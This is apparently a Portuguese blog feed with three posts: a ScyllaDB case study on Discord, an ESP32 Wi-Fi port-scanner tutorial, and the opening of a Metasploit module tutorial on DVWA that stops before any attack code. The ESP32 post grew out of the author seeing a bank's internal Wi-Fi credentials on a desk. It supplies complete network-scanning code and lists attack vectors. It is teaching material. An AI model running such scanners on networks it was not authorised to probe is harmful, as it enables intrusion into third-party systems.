Forem: Higor Diego

Por dentro do ScyllaDB: A escolha do Discord para performance máxima

Higor Diego — Mon, 26 Jan 2026 12:38:31 +0000

Para qualquer profissional de tecnologia, projetar sistemas que operam em hiperescala é um dos desafios mais complexos e fascinantes. Poucas empresas no mundo lidam com uma escala tão extrema quanto o Discord, uma plataforma que conecta milhões de usuários simultaneamente, processando um volume de dados que beira o inimaginável.

A experiência do usuário em uma plataforma como essa é diretamente impactada pela latência. Uma simples mensagem que demora a chegar pode degradar a qualidade do serviço. Agora, imagine esse desafio na escala de trilhões de mensagens. Para o Discord, a latência não era um incômodo, mas um obstáculo crítico que precisava ser superado.

Neste artigo, faremos uma análise técnica da jornada do Discord, desde os desafios de escalabilidade com tecnologias tradicionais até a migração para o ScyllaDB, o banco de dados que se tornou a solução para seus problemas de performance. Se você se interessa por arquitetura de sistemas distribuídos e soluções de engenharia para problemas de larga escala, este estudo de caso é para você.

Casos como o do Discord não são exceção no mercado. Em diferentes projetos que acompanhamos, vemos empresas enfrentando exatamente os mesmos sintomas: crescimento rápido, aumento de usuários, mais dados sendo processados e, junto com isso, latência subindo, custos explodindo e instabilidade aparecendo em momentos críticos.

Muitos clientes chegam até nós quando o sistema “ainda funciona”, mas já começou a dar sinais claros de estresse: picos de latência, filas acumulando, banco de dados no limite e times apagando incêndio em produção. Esse é exatamente o ponto onde decisões arquiteturais passam a ser tão importantes quanto novas funcionalidades.

A Jornada por Performance: De MongoDB a ScyllaDB

A história da infraestrutura do Discord é uma verdadeira saga de engenharia, uma busca contínua pela performance perfeita em uma escala que poucos ousam enfrentar.

Os Primeiros Dias com MongoDB

No início, como muitas startups, o Discord utilizava MongoDB. Era uma solução flexível, de fácil desenvolvimento e que serviu bem ao propósito inicial. Contudo, a plataforma tinha uma característica fundamental: uma carga de trabalho extremamente pesada em escrita (write-heavy). Cada mensagem enviada é uma nova escrita no banco de dados.

Quando o Discord atingiu a marca de 100 milhões de mensagens, os problemas começaram a aparecer. O conjunto de dados e índices já não cabia mais na RAM, e a latência, antes previsível, começou a disparar. O MongoDB, embora excelente para muitos casos de uso, não era otimizado para a avalanche de escritas que o Discord precisava suportar. A arquitetura estava chegando ao seu limite.

A Era do Cassandra e a Busca por Escalabilidade

A equipe de engenharia precisava de uma solução construída para escalabilidade e cargas de trabalho de escrita massivas. A escolha natural na época (por volta de 2017) foi o Cassandra.

O Cassandra foi projetado com uma arquitetura distribuída e sem mestre (masterless), otimizada para alta disponibilidade e, crucialmente, para uma performance de escrita excepcional. A migração foi um sucesso e permitiu que o Discord continuasse sua trajetória de crescimento exponencial, chegando a bilhões e, eventualmente, trilhões de mensagens.

Novas Fronteiras, Novos Desafios

Mesmo uma ferramenta poderosa como o Cassandra tem seus limites quando levada a um extremo que poucas empresas no mundo já viram. Com um cluster de 177 nós e trilhões de mensagens, novos inimigos da performance surgiram:

O "Garbage Collector" da JVM: O Cassandra roda na JVM, e suas pausas para "coleta de lixo", embora geralmente rápidas, tornavam-se um problema massivo em um cluster daquele tamanho. Essas pausas geravam picos de latência que se propagavam pelo sistema, afetando a experiência do usuário de forma imprevisível.
"Partições Quentes" (Hot Partitions): Servidores ou canais extremamente populares concentravam um volume desproporcional de tráfego em nós específicos do cluster. Esses nós superaqueciam, criando gargalos que retardavam as operações para todos.

A equipe do Discord se viu novamente em uma encruzilhada. Eles não precisavam de um pequeno ajuste; eles precisavam de um salto quântico em eficiência. Era hora de repensar a fundação mais uma vez. E foi nessa busca que o ScyllaDB entrou no radar.

O diferencial do ScyllaDB não reside apenas em ser 'mais rápido', mas em sua arquitetura fundamental, que prometia resolver a causa raiz dos problemas que eles enfrentavam com o Cassandra.

Esse tipo de cenário é muito parecido com o que vemos em clientes que crescem rápido: a tecnologia que funcionava bem no início começa a virar gargalo. Não é falha da ferramenta, é mudança de contexto. Arquitetura que nasce pequena precisa evoluir conforme o negócio muda.

Análise da Arquitetura: O Poder do ScyllaDB

Para entender o poder do ScyllaDB, a analogia de um restaurante de alta performance é útil. Enquanto outras soluções podem ter uma "cozinha compartilhada" que gera contenção, o ScyllaDB projeta cada componente para máxima eficiência.

Os pilares dessa arquitetura são:

Base em C++: Ao ser escrito em C++, o ScyllaDB opera mais próximo ao hardware, eliminando a camada de abstração da JVM e, consequentemente, as pausas imprevisíveis causadas pelo Garbage Collector. O resultado é uma performance com menos sobrecarga e maior previsibilidade.
Arquitetura "Shard-per-Core": Este é o ponto central de sua eficiência. Em vez de compartilhar recursos, o ScyllaDB designa um núcleo de CPU (um "shard") para gerenciar um conjunto específico de dados. Cada shard tem sua própria memória, cache e I/O. Isso elimina a contenção por recursos e otimiza o paralelismo, permitindo que o banco de dados escale linearmente com o número de núcleos.
Framework Assíncrono Seastar: O Seastar é o motor que impulsiona essa arquitetura. É um framework de programação de alta performance que gerencia as tarefas de forma assíncrona, garantindo que os núcleos da CPU estejam sempre processando dados, sem tempos ociosos ou bloqueios desnecessários.

Essa fundação arquitetônica ataca diretamente os problemas enfrentados pelo Discord: elimina as pausas do Garbage Collector e, graças à eficiência do modelo shard-per-core, gerencia as partições quentes de forma muito mais eficaz.

Em projetos com clientes, usamos esse mesmo tipo de análise: entender onde existe contenção, onde há disputa por recursos e onde a arquitetura impede o paralelismo. Nem sempre a solução é ScyllaDB, mas o método de pensar é sempre o mesmo: resolver a causa do problema, não apenas o sintoma.

Escalabilidade no ScyllaDB: Como Funciona?

A escalabilidade do ScyllaDB vai além do shard-per-core. Ela se baseia em uma arquitetura distribuída, sem mestre (masterless), onde todos os nós são iguais. Na nossa experiência, o ponto crítico a entender é como os dados são distribuídos…

Distribuição em Anel (Token Ring): Os dados no ScyllaDB são distribuídos em um anel usando hashing consistente. Cada nó no cluster é responsável por um ou mais intervalos de dados (tokens). Quando você escreve um dado, uma função de hash é aplicada à chave de partição para determinar em qual nó (e seu respectivo shard) aquele dado deve ser armazenado.
Fator de Replicação (Replication Factor): Para garantir a alta disponibilidade, os dados não são armazenados em apenas um nó. O fator de replicação define quantas cópias de cada dado existirão no cluster. Um fator de 3, por exemplo, significa que cada pedaço de dado será replicado em 3 nós diferentes.
Protocolo Gossip: Como os nós sabem uns dos outros? Através do protocolo Gossip. Periodicamente, cada nó "fofoca" com outros nós aleatórios, trocando informações sobre o estado do cluster. É assim que um nó descobre se outro ficou offline ou se um novo nó entrou no cluster.
Escalabilidade Elástica: Adicionar um novo nó ao cluster é um processo transparente. O novo nó anuncia sua presença via Gossip, recebe suas responsabilidades no anel de tokens, e o cluster automaticamente começa a transferir os dados relevantes para ele, rebalanceando a carga sem a necessidade de intervenção manual.

Essa combinação de distribuição, replicação e comunicação descentralizada é o que permite ao ScyllaDB escalar horizontalmente, simplesmente adicionando mais máquinas.

Vantagens e Desvantagens: Quando ScyllaDB Brilha (e Quando Não)?

Nenhuma tecnologia é bala de prata. Como especialista, é crucial avaliar os prós e contras.

Vantagens:

Performance Extrema: Para cargas de trabalho de alta escrita e leitura que exigem baixa latência, o ScyllaDB é, sem dúvida, um dos bancos de dados mais rápidos do mercado.
Custo-Benefício em Escala: Graças à sua eficiência, você geralmente precisa de menos nós (e hardware menos robusto) em comparação com o Cassandra para atingir a mesma performance, o que se traduz em economia de custos.
Compatibilidade com o Ecossistema Cassandra: A compatibilidade com a CQL e os drivers do Cassandra é uma vantagem imensa, facilitando migrações e o aproveitamento de ferramentas existentes.

Desvantagens:

Complexidade Operacional: Não se engane, ScyllaDB é um sistema distribuído complexo. O gerenciamento, monitoramento e troubleshooting de um cluster exigem conhecimento especializado.
Curva de Aprendizagem: Embora a CQL seja familiar, otimizar a performance e entender as métricas específicas do ScyllaDB (diferentes das do Cassandra) exige estudo.
Modelo de Dados Restritivo: Assim como outros bancos NoSQL, o ScyllaDB não é uma solução para todos os problemas. A ausência de JOINs e a necessidade de modelar os dados em torno das suas consultas são cruciais. Se o seu caso de uso exige consultas complexas e ad-hoc, um banco de dados SQL pode ser mais apropriado.

Para clientes, esse tipo de avaliação é essencial. Não existe tecnologia perfeita, existe tecnologia adequada ao momento do negócio, ao time e ao orçamento. Parte do nosso trabalho é justamente ajudar a escolher a ferramenta certa para o desafio certo.

Minha Opinião de Especialista:

Eu recomendo o ScyllaDB para cenários onde a baixa latência e a alta taxa de transferência (throughput) são requisitos não negociáveis. Pense em feeds de atividades, sistemas de IoT, time-series data, e aplicações de chat em larga escala como o Discord. Se você já usa Cassandra e está enfrentando gargalos de performance, o ScyllaDB é o candidato natural para uma migração.

Contudo, para projetos menores ou equipes sem experiência em sistemas distribuídos, a complexidade operacional pode ser um obstáculo. Nesses casos, um banco de dados gerenciado (DBaaS) ou uma tecnologia mais simples pode ser um ponto de partida mais sensato.

A Migração: Uma Operação Cirúrgica

A teoria por trás do ScyllaDB é sólida, mas o desafio da migração era imenso. Como mover trilhões de mensagens para um novo banco de dados sem indisponibilidade ou perda de dados?

A equipe do Discord executou um plano de migração notável. Em vez de usar ferramentas padrão, eles desenvolveram uma solução customizada em Rust para garantir a máxima performance. Os resultados da migração foram impressionantes: a ferramenta atingiu picos de 3.2 milhões de registros por segundo.

O processo completo, que tinha uma estimativa inicial de três meses, foi concluído em impressionantes 9 dias.

Em projetos reais, nem toda migração é tão extrema, mas o cuidado é o mesmo: planejar, testar, validar e executar sem interromper o negócio. Migração bem feita é aquela que o usuário final nem percebe.

Os Resultados Falam por Si

Os resultados pós-migração foram transformadores e validaram a escolha da nova arquitetura. Os ganhos de performance e eficiência foram imediatos:

Latência: Os picos de latência, que antes chegavam a 500ms, foram eliminados. O sistema se estabilizou em uma latência constante de 5ms.
Infraestrutura: O cluster foi drasticamente reduzido de 177 para apenas 72 nós, uma economia de quase 60% em infraestrutura.
Custos: Consequentemente, a redução no número de máquinas gerou uma economia significativa nos custos operacionais.

Com essa migração, o Discord não apenas resolveu seu problema de latência, mas também construiu uma fundação mais estável, eficiente e escalável para o futuro.

Para nós, estudar casos como esse não é só curiosidade técnica. É parte do nosso processo de preparar soluções melhores para os clientes, antecipando problemas que eles ainda nem sentiram — mas que certamente sentirão se o sistema crescer.

Conclusão: A Ferramenta Certa para o Desafio Certo

A história do Discord não é apenas sobre a troca de um banco de dados por outro. É uma lição sobre a importância de entender a fundo os problemas de arquitetura e não ter medo de questionar o status quo para encontrar a solução certa. Ao escolher ScyllaDB, a equipe de engenharia do Discord não optou pelo caminho mais fácil, mas pelo caminho que resolvia a causa raiz de seus problemas de latência e escalabilidade.

Para desenvolvedores e arquitetos, o aprendizado é claro: o sucesso de um sistema em hiperescala depende fundamentalmente das escolhas de sua fundação. Analisar casos como este nos prepara para tomar decisões mais informadas em nossos próprios projetos, independentemente da escala.

A pergunta final é: qual desafio de arquitetura você está enfrentando hoje — e o que precisaria mudar na sua fundação para que ele deixe de ser um problema amanhã?

Explorando redes com ESP32 WIFI.

Higor Diego — Sun, 26 Nov 2023 14:35:09 +0000

Recentemente, vivenciei uma situação peculiar em um banco durante uma revista em minha bolsa. Foi constatado que a entrada de notebooks não era permitida na área específica, levando o guarda encarregado da revista a retirar meu notebook, em conformidade com as normas estabelecidas.

No entanto, o que despertou minha curiosidade foi o fato de que outros dispositivos periféricos, como bateria, cabos e um ESP32, permaneceram na bolsa, possibilitando minha entrada na área restrita. Após adentrar o recinto, fui conduzido a uma sala para aguardar o gerente. Durante esse período, aproveitei para realizar uma análise do ambiente e, para minha surpresa, deparei-me com um papel sobre a mesa contendo as informações de login e senha da rede Wi-Fi interna.

Essa situação suscitou uma reflexão: se a restrição de entrada com notebooks visa à segurança, será que o ESP32 não poderia ser utilizado para efetuar ataques à rede? Com base nessa ponderação, optei por redigir este artigo com o intuito de explorar um estudo sobre redes, buscando compreendê-las sem a utilização de notebooks ou ferramentas avançadas como o nmap (por exemplo), concentrando-se apenas no ESP32.

É fundamental salientar que o propósito deste artigo é proporcionar informações relevantes sobre segurança, sendo estritamente um estudo teórico.

O que e arduino ?

Arduino é uma plataforma de prototipagem de código aberto que consiste em hardware e software projetados para facilitar o desenvolvimento de projetos eletrônicos. O hardware Arduino é baseado em placas de circuito integradas com microcontroladores e uma interface de programação. Já o software consiste em uma IDE (Ambiente de Desenvolvimento Integrado) que permite a programação dessas placas.

Principais características do Arduino:

Microcontrolador: As placas Arduino são equipadas com microcontroladores que executam programas escritos em uma linguagem de programação derivada do C/C++.
IDE Arduino: A IDE Arduino fornece um ambiente de programação simples e intuitivo, facilitando o desenvolvimento de código para controle de dispositivos e interação com sensores.
Placas Variadas: Existem várias placas Arduino com diferentes especificações e tamanhos, desde placas básicas para projetos simples até modelos mais avançados com maior poder de processamento e recursos adicionais.
Entradas e Saídas (I/O): As placas Arduino têm pinos de entrada/saída (I/O) que permitem a conexão a diferentes componentes eletrônicos, como sensores, LEDs, motores, entre outros.
Comunicação: As placas Arduino suportam diferentes métodos de comunicação, como USB, UART, I2C e SPI, permitindo a interação com outros dispositivos e módulos.
Comunidade Ativa: Arduino possui uma comunidade global ativa que compartilha projetos, códigos e oferece suporte, facilitando o aprendizado e a resolução de problemas.

O que é ESP32?

O ESP32 é um microcontrolador de baixo custo, baixa potência e altamente integrado, pertencente à família ESP8266. Desenvolvido pela Espressif Systems, uma empresa chinesa, este microcontrolador é amplamente utilizado em projetos de Internet das Coisas (IoT) devido às suas capacidades de conectividade Wi-Fi e Bluetooth.

Reconhecido por sua versatilidade e desempenho, o ESP32 oferece uma ampla gama de recursos, incluindo processador dual-core, conectividade sem fio, GPIOs (General Purpose Input/Output), capacidade de interface com sensores e periféricos, além de suporte a diversos protocolos de comunicação. Tais características fazem dele uma escolha popular para aplicações em IoT, automação residencial, projetos de eletrônica e desenvolvimento de protótipos.

Configuração Necessária

A seguir, listamos alguns itens essenciais para a realização do estudo de caso.

Conexao de rede.

No esp32 podemos se conectar na wifi e com isso iremos analisar o codigo simples que nos possibilita a conexao.

Segue abaixo o codigo:



#include <WiFi.h>

const char *ssid = "SEU_SSID";
const char *password = "SUA_SENHA";

void setup() {
  Serial.begin(115200);
  delay(10);

  // Conectar-se à rede WiFi
  Serial.println();
  Serial.print("Conectando a ");
  Serial.println(ssid);

  WiFi.begin(ssid, password);

  while (WiFi.status() != WL_CONNECTED) {
    delay(500);
    Serial.print(".");
  }

  Serial.println("");
  Serial.println("Conectado ao WiFi");
  Serial.print("Endereço IP: ");
  Serial.println(WiFi.localIP());
}

void loop() {

}

Com referência ao exemplo anterior, procedemos com a explicação detalhada, partindo do código apresentado.

Inclusão da Biblioteca WiFi:




#include <WiFi.h>

Isso inclui a biblioteca WiFi, necessária para lidar com as funcionalidades de conexão WiFi do ESP32.

Definição das Credenciais da Rede WiFi:




const char *ssid = "SEU_SSID";
const char *password = "SUA_SENHA";

Substitua "SEU_SSID" e "SUA_SENHA" pelos respectivos SSID e senha da sua rede WiFi.

Configuração do Ambiente no Método setup():




void setup() {
  Serial.begin(115200);
  delay(10);

Inicia a comunicação serial com uma taxa de 115200 bps e espera por 10 milissegundos.

Conexão à Rede WiFi no Método setup():




Serial.println();
Serial.print("Conectando a ");
Serial.println(ssid);

WiFi.begin(ssid, password);

while (WiFi.status() != WL_CONNECTED) {
  delay(500);
  Serial.print(".");
}

O programa imprime no console serial que está tentando se conectar à rede especificada.

WiFi.begin(ssid, password) inicia a conexão à rede WiFi usando as credenciais fornecidas.

O loop while espera até que a conexão seja estabelecida (WL_CONNECTED).

Exibição de Informações Após a Conexão Bem-sucedida no Método setup():




Serial.println("");
Serial.println("Conectado ao WiFi");
Serial.print("Endereço IP: ");
Serial.println(WiFi.localIP());

Uma vez conectado, o programa imprime que foi conectado com sucesso e exibe o endereço IP atribuído ao ESP32.

Método loop():



    void loop() {

    }

O método loop() está vazio neste exemplo. Este é o local onde você colocaria o código que deve ser executado continuamente após a inicialização.

O que faremos ?

Agora que adquirimos conhecimento sobre como realizar a conexão com o dispositivo, podemos ponderar sobre os seguintes aspectos:

Possuo um periférico capaz de se integrar à rede.
Esse periférico dispõe de capacidade de processamento.
Ele opera utilizando uma linguagem de programação.

Diante dessas considerações, surge a pergunta: por que não desenvolver algo para explorar a rede?

A partir dessa premissa, exploraremos os endereços IP da rede para identificar portas abertas.

Atualmente, já possuímos:

Conexão estabelecida com a rede WiFi.
Atribuição dinâmica de endereço IP por meio do DHCP da rede.

Com base nessas informações, iniciaremos uma busca por portas abertas em possíveis computadores ou servidores.

A seguir, apresento o código correspondente:




#include <WiFi.h>

const char *ssid = "SEU_SSID";
const char *password = "SUA_SENHA";

// Lista de IPs a serem testados
IPAddress ips[255];
int currentIpIndex = 0;

// Lista de portas a serem testadas
int portas[] = {80, 443, 22};

void setup() {
  Serial.begin(19200);
  delay(10);

  Serial.println("Conectando ao WiFi...");
  WiFi.begin(ssid, password);

  while (WiFi.status() != WL_CONNECTED) {
    delay(500);
    Serial.print(".");
  }

  Serial.println("");
  Serial.println("WiFi conectado");
  Serial.println("IP address: ");
  Serial.println(WiFi.localIP());
}

void loop() {
  scanner();

  // Aguardar antes de repetir o teste
  delay(5000);
}

void scanner() {
  if (currentIpIndex >= 255) {
    // Resetar o índice para começar de novo
    currentIpIndex = 0;
  }

  // Extrair os três primeiros octetos do endereço IP
  byte firstThreeOctets[3];
  IPAddress localIP = WiFi.localIP();
  for (int i = 0; i < 3; i++) {
    firstThreeOctets[i] = localIP[i];
  }

  // Criar o IPAddress com base nos três primeiros octetos e no último octeto variável
  IPAddress ipToTest(firstThreeOctets[0], firstThreeOctets[1], firstThreeOctets[2], currentIpIndex);

  for (int j = 0; j < sizeof(portas) / sizeof(portas[0]); j++) {
    WiFiClient client;
    if (client.connect(ipToTest, portas[j])) {
      Serial.printf("Conectado a %s na porta %d\n", ipToTest.toString().c_str(), portas[j]);
      client.stop();
    } else {
      Serial.printf("Falha na conexão a %s na porta %d\n", ipToTest.toString().c_str(), portas[j]);
    }
  }

  // Incrementar o índice para o próximo IP na próxima chamada
  currentIpIndex++;
}

Inclusão de Bibliotecas:




#include <WiFi.h>

Essa parte do código inclui as bibliotecas necessárias para a comunicação com a rede WiFI.




const char *ssid = "SEU_SSID";
const char *password = "SUA_SENHA";

Substitua "SEU_SSID" e "SUA_SENHA" pelo nome e senha da sua rede WiFi.
Listas de IPs e Portas:




IPAddress ips[255];
int currentIpIndex = 0;
int portas[] = {80, 443, 22};

ips: Uma lista de endereços IP a serem testados.
currentIpIndex: Índice atual na lista de IPs.
portas: Uma lista de portas a serem testadas.

Configuração no Método setup():




void setup() {
  Serial.begin(19200);
  delay(10);

  Serial.println("Conectando ao WiFi...");
  WiFi.begin(ssid, password);

  while (WiFi.status() != WL_CONNECTED) {
    delay(500);
    Serial.print(".");
  }

  Serial.println("");
  Serial.println("WiFi conectado");
  Serial.println("IP address: ");
  Serial.println(WiFi.localIP());
}

Serial.begin(19200): Inicia a comunicação serial com uma taxa de 19200 bps.
WiFi.begin(ssid, password): Inicia a conexão WiFi usando as credenciais fornecidas.
while (WiFi.status() != WL_CONNECTED): Aguarda até que a conexão seja estabelecida.

Após a conexão bem-sucedida, o código imprime mensagens indicando que o WiFi foi conectado e exibe o endereço IP atribuído ao dispositivo.

Método loop():




void loop() {
  scanner();

  // Aguardar antes de repetir o teste
  delay(5000);
}

O método loop() chama a função scanner() (que ainda não está definida neste código) para realizar o teste de porta e aguarda 5 segundos antes de repetir.

Método scanner():




void scanner() {
  if (currentIpIndex >= 255) {
    // Resetar o índice para começar de novo
    currentIpIndex = 0;
  }

scanner(): Uma função que realiza a verificação de portas em diferentes IPs.
if (currentIpIndex >= 255): Quando todos os IPs foram testados, o índice é resetado para reiniciar o processo.

Continuação do Método scanner():




  // Extrair os três primeiros octetos do endereço IP
  byte firstThreeOctets[3];
  IPAddress localIP = WiFi.localIP();
  for (int i = 0; i < 3; i++) {
    firstThreeOctets[i] = localIP[i];
  }

  // Criar o IPAddress com base nos três primeiros octetos e no último octeto variável
  IPAddress ipToTest(firstThreeOctets[0], firstThreeOctets[1], firstThreeOctets[2], currentIpIndex);

firstThreeOctets: Extrai os três primeiros octetos do endereço IP local do dispositivo.
IPAddress ipToTest: Cria um novo endereço IP usando os três primeiros octetos e o índice variável para o último octeto.

Continuação e Finalização do Método scanner():




  for (int j = 0; j < sizeof(portas) / sizeof(portas[0]); j++) {
    WiFiClient client;
    if (client.connect(ipToTest, portas[j])) {
      Serial.printf("Conectado a %s na porta %d\n", ipToTest.toString().c_str(), portas[j]);
      client.stop();
    } else {
      Serial.printf("Falha na conexão a %s na porta %d\n", ipToTest.toString().c_str(), portas[j]);
    }
  }

  // Incrementar o índice para o próximo IP na próxima chamada
  currentIpIndex++;
}

Um loop que percorre a lista de portas e tenta conectar-se a cada combinação de IP e porta. Se a conexão for bem-sucedida, imprime a mensagem "Conectado". Caso contrário, imprime "Falha na conexão".

Exploração

Após a compilação e o upload no ESP32, o resultado na porta serial é apresentado da seguinte forma:

Com base nesse resultado, identificamos um IP (192.168.0.1) com a porta 80 aberta, possibilitando a enumeração de servidores e portas abertas no ambiente ao qual estamos conectados.

Vetores de Ataque

Considerando o ESP32, é possível realizar diversos tipos de ataques, tais como:

Sniffer: Interceptação de dados em uma rede para análise.
Scan de Portas: Identificação de portas abertas em um sistema.
Scan de WiFi: Exploração de redes sem fio disponíveis.
Ataque de Força Bruta: Tentativa de descobrir senhas por meio de repetidas combinações.

Com a proliferação de dispositivos portáteis no mundo da IoT, embora esses dispositivos ofereçam inovações significativas, também abrem oportunidades para ataques mais sofisticados, muitas vezes realizados com custos inferiores a 5 dólares.

Como se Proteger?

Para proteger-se contra esses vetores de ataques, é fundamental adotar práticas de segurança robustas, incluindo:

Monitoramento Constante: Monitorar regularmente o tráfego e as atividades suspeitas na rede.
Firewalls: Configurar firewalls para restringir o tráfego indesejado.
Desabilitar Serviços Não Necessários: Desativar serviços que não são essenciais para reduzir a superfície de ataque.
Filtro de Endereço MAC: Habilite o filtro de endereço MAC no roteador para permitir apenas dispositivos autorizados.Mantenha uma lista branca de endereços MAC permitidos.
Desative o SSID Broadcasting: Desative a transmissão do nome da sua rede (SSID broadcast).Isso torna sua rede menos visível para scanners, mas não fornece segurança total.

Compartilhe seu carinho:

Estou verdadeiramente empenhado em criar conteúdo constante, explorando compras de equipamentos e ferramentas para trazer temas relevantes. Se você gostou deste artigo, ou de outros que compartilhei, e deseja oferecer seu apoio para me ajudar a continuar nessa jornada, ficaria imensamente grato. Cada contribuição é um passo significativo para manter viva essa paixão que compartilhamos.

Aqui está o link para apoiar: Buy Me a Coffee.

Obrigado pelo seu carinho e por fazer parte desta jornada! 🌟

Conclusão

Em conclusão, exploramos a conexão WiFi com o ESP32, aprendemos sobre a identificação de portas abertas na rede e discutimos medidas de segurança contra acessos não autorizados. O código apresentado mostrou como realizar um scanner de portas simples, ressaltando a importância de práticas seguras, atualizações regulares e consciência sobre potenciais vetores de ataques. Proteger sua rede WiFi é vital para garantir a segurança dos dispositivos conectados, e a implementação de medidas preventivas é fundamental para mitigar riscos e manter a integridade do ambiente digital.

Referências

https://www.espressif.com/en/products/socs/esp32
https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-reference/network/esp_wifi.html

Guia de passo a passo para escrever um exploit.

Higor Diego — Mon, 20 Nov 2023 22:15:09 +0000

Antes de nos aprofundarmos no intrigante universo do Metasploit, é crucial destacar a necessidade de utilizar essas ferramentas de maneira ética e legal. O Metasploit, com todas as suas funcionalidades poderosas, deve ser empregado apenas com a permissão explícita dos proprietários dos sistemas em teste.

Este artigo destina-se a profissionais de segurança ética, pesquisadores e entusiastas que buscam compreender e fortalecer a segurança digital. Qualquer utilização imprópria das informações aqui fornecidas para atividades mal-intencionadas não apenas é ilegal, mas também prejudicial à integridade dos sistemas e à confiança online.

A responsabilidade pelo uso ético dessas ferramentas recai integralmente sobre o indivíduo. Este texto visa promover o entendimento e o conhecimento responsável na área de segurança digital. Juntos, vamos explorar o Metasploit de maneira ética, contribuindo para um ambiente digital mais seguro e protegido.

O Metasploit

Pense no Metasploit como um superdetetive cibernético utilizado por especialistas em segurança para identificar e corrigir vulnerabilidades nos sistemas de computadores antes que hackers mal-intencionados possam explorá-las. Ele automatiza a busca por pontos fracos, agindo como um herói digital na proteção de nossos computadores. No entanto, é fundamental usar essa ferramenta de maneira ética, obtendo permissão antes de iniciar qualquer "investigação".

O Metasploit é uma poderosa estrutura de teste de penetração, fornecendo informações sobre vulnerabilidades de sistemas e auxiliando profissionais de segurança na identificação e correção dessas falhas antes que se tornem alvos de invasores. Desenvolvido para automatizar o teste de penetração, o Metasploit é utilizado por especialistas em segurança e hackers éticos, oferecendo uma variedade de ferramentas para descoberta, exploração e validação de falhas de segurança.

Msfconsole

O msfconsole é a interface de linha de comando central no Metasploit, oferecendo um ambiente interativo para que os usuários explorem suas funcionalidades. Ao iniciar o msfconsole, os usuários entram em um ambiente onde podem carregar e configurar módulos, escolher exploits específicos, selecionar payloads e lançar ataques contra sistemas-alvo para avaliar a segurança. Essa ferramenta é essencial para profissionais de segurança que desejam testar a robustez de sistemas e redes, sempre com permissão adequada.

Explorar o Metasploit é embarcar em uma jornada fascinante de descoberta e proteção digital. Lembre-se sempre da importância de agir de maneira ética e legal ao utilizar essas ferramentas, contribuindo para um ambiente digital mais seguro e protegido.

Meterpreter

O Meterpreter é um componente essencial no framework Metasploit, projetado para oferecer uma série de recursos pós-exploração em um sistema comprometido. Em termos mais simples, você pode pensar no Meterpreter como uma espécie de "ponte digital" entre o invasor e o sistema invadido, permitindo uma interação mais avançada e controle sobre a máquina comprometida.

Com o Meterpreter, um invasor pode executar uma variedade de comandos no sistema comprometido, como copiar, excluir, fazer o upload ou download de arquivos, capturar telas, ativar a webcam, manipular processos e muito mais. Ele oferece uma interface rica para explorar e controlar um sistema invadido de forma mais flexível.

Criando o script

Criaremos um script básico no Metasploit usando Ruby para conduzir um ataque de injeção de comando com shell reverso. O projeto DVWA será empregado para aprofundar nossa compreensão do processo em sua totalidade.

Antes de executar nosso script, é necessário ter os seguintes itens instalados em sua máquina local:

Verifique se você possui essas ferramentas instaladas antes de avançar com o desenvolvimento e a execução do script.

Vamos criar uma pasta denominada "artigo" dentro de /usr/share/metasploit-framework/modules/auxiliary.

Segue abaixo:

sudo mkdir /usr/share/metasploit-framework/modules/auxiliary/artigo

Após sua criação iremos criar um arquivo chamado command_injection.rb, segue a instrução abaixo:

cd /usr/share/metasploit-framework/modules/auxiliary/artigo && touch command_injection.rb

Criaremos um código simples que realiza uma requisição externa do tipo HTTP ou HTTPS, a fim de compreender a estrutura de funcionamento de um script dentro do msfconsole.

Segue o código abaixo:


class MetasploitModule < Msf::Auxiliary
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Criando um script simples que fará uma requisição externa via http',
      'Description' => %q{
        A intenção desse script é executar uma simples requisição http.
      },
      'Author'      => [ 'Higor Diego' ],
      'License'     => BSD_LICENSE))

      register_options(
        [
          OptString.new('RHOST',  [true, 'Solicitação de URL para site, por exemplo: google.com.br']),
          OptString.new('RPATH',  [true, 'Caminho para a solicitação de envio do URL, por exemplo: /login']),
          OptString.new('RMETHOD', [true, "PUT or DELETE", "GET"]),

        ]
      )
      deregister_options('RHOSTS')
      deregister_options('VHOST')
    end

  def run
    begin
      path = datastore['RPATH']
      method = datastore['RMETHOD']
      host = datastore['RHOST']

      res = send_request_cgi(
        {
          'uri'    => "#{normalize_uri(path)}",
          'method' => method,
        },
        20
      )

      print_good(" Send request #{host}#{normalize_uri(path)}" )
      print_good(" Response status code:  #{res.code}")
    rescue ::Exception => e

      return nil
    end
  end

end

Esse é um script em Ruby que utiliza o framework Metasploit para criar um módulo auxiliar (auxiliary module). O propósito deste script é realizar uma requisição HTTP simples para uma URL especificada, usando os métodos HTTP PUT, DELETE ou GET.

Vamos analisar o código por partes:

Metasploit Module Class:

class MetasploitModule < Msf::Auxiliary

O script define uma classe chamada MetasploitModule que herda da classe Msf::Auxiliary, indicando que é um módulo auxiliar no contexto do Metasploit.

Inicialização:

def initialize(info = {})
  super(update_info(info,
    'Name'       => 'Criando um script simples que fará uma requisição externa via http',
    'Description'=> %q{
      A intenção desse script é executar uma simples requisição http.
    },
    'Author'     => [ 'Higor Diego' ],
    'License'    => BSD_LICENSE))

O método initialize é chamado quando uma instância da classe é criada. Ele define informações sobre o módulo, como nome, descrição, autor e licença.

Opções do Módulo:

register_options(
  [
          OptString.new('RHOST',  [true, 'Solicitação de URL para site, por exemplo: google.com.br']),
          OptString.new('RPATH',  [true, 'Caminho para a solicitação de envio do URL, por exemplo: /login']),
          OptString.new('RMETHOD', [true, "PUT or DELETE", "GET"]),
  ]
)
deregister_options('RHOSTS')
deregister_options('VHOST')

O método register_options é usado para definir as opções que podem ser configuradas para o módulo. Neste caso, as opções incluem o destino da requisição (RHOST), o caminho da URL (RPATH) e o método HTTP a ser utilizado (RMETHOD).

Além disso, as opções 'RHOSTS' e 'VHOST' são desregistradas, indicando que elas não são relevantes para este módulo.

Método run:

def run
  begin
    path = datastore['RPATH']
    method = datastore['RMETHOD']
    host = datastore['RHOST']

    res = send_request_cgi(
      {
        'uri'    => "#{normalize_uri(path)}",
        'method' => method,
      },
      20
    )

    print_good(" Send request #{host}#{normalize_uri(path)}" )
    print_good(" Response status code:  #{res.code}")
  rescue ::Exception => e
    return nil
  end
end

O método run é chamado quando o módulo é executado. Ele realiza uma requisição HTTP usando o método e a URL especificados nas opções. O resultado da requisição é então exibido, mostrando o host e o código de status da resposta.

Se ocorrer uma exceção durante a execução (por exemplo, se a requisição falhar), ela será capturada e tratada.

Abrindo o msfconsole, iremos procurar o nosso script dentro do módulos existente como o seguinte comando:

Iniciando o msfconsole


┌──(higordiego㉿higordiego)-[~]
└─$ msfconsole -q
